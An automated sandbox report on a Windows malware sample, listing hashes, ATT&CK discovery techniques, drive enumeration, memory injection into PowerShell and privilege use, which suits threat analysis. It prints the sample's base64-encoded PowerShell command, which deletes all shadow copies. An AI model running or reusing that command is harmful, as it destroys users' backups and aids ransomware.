14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632

General

Target

14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
Size

164KB
MD5

7518ecf9cd7d3f204de349103bd95c54
SHA1

417df7e036285c9409affa1e9bef8634d8994869
SHA256

14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632
SHA512

71a181e597a5d9eae8ccd22683b650039f2506ba502b44a2da4f786e8884a1538603df9ab57d19c78d9777cb8f643ec78439346c32611776984acc569dbaba32

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe

description	ioc	process
File opened (read-only)	\??\W:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\Z:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\B:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\G:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\J:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\O:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\Q:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\U:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\E:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\I:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\L:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\T:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\Y:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\F:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\K:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\N:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\R:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\S:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\V:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\A:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\H:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\M:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\P:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
File opened (read-only)	\??\X:	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exepowershell.exe

pid process

1752 14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
1612 powershell.exe

pid	process
1752	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
1612	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeBackupPrivilege	1012	vssvc.exe
Token: SeRestorePrivilege	1012	vssvc.exe
Token: SeAuditPrivilege	1012	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe

description	pid	process	target process
PID 1752 wrote to memory of 1612	1752	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe	powershell.exe
PID 1752 wrote to memory of 1612	1752	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe	powershell.exe
PID 1752 wrote to memory of 1612	1752	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe	powershell.exe
PID 1752 wrote to memory of 1612	1752	14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe
"C:\Users\Admin\AppData\Local\Temp\14d09a259f72569f309fdd7bc14519753d01016706c7b9335a215b2d0b64c632.exe"
1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1524

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1612-56-0x000007FEFC261000-0x000007FEFC263000-memory.dmp

Filesize
8KB

Download
memory/1612-58-0x0000000002710000-0x0000000002712000-memory.dmp

Filesize
8KB

Download
memory/1612-59-0x0000000002712000-0x0000000002714000-memory.dmp

Filesize
8KB

Download
memory/1612-60-0x0000000002714000-0x0000000002717000-memory.dmp

Filesize
12KB

Download
memory/1612-57-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp

Filesize
11.4MB

Download
memory/1612-61-0x000000001B760000-0x000000001BA5F000-memory.dmp

Filesize
3.0MB

Download
memory/1612-62-0x000000000271B000-0x000000000273A000-memory.dmp

Filesize
124KB

Download
memory/1752-55-0x00000000769D1000-0x00000000769D3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads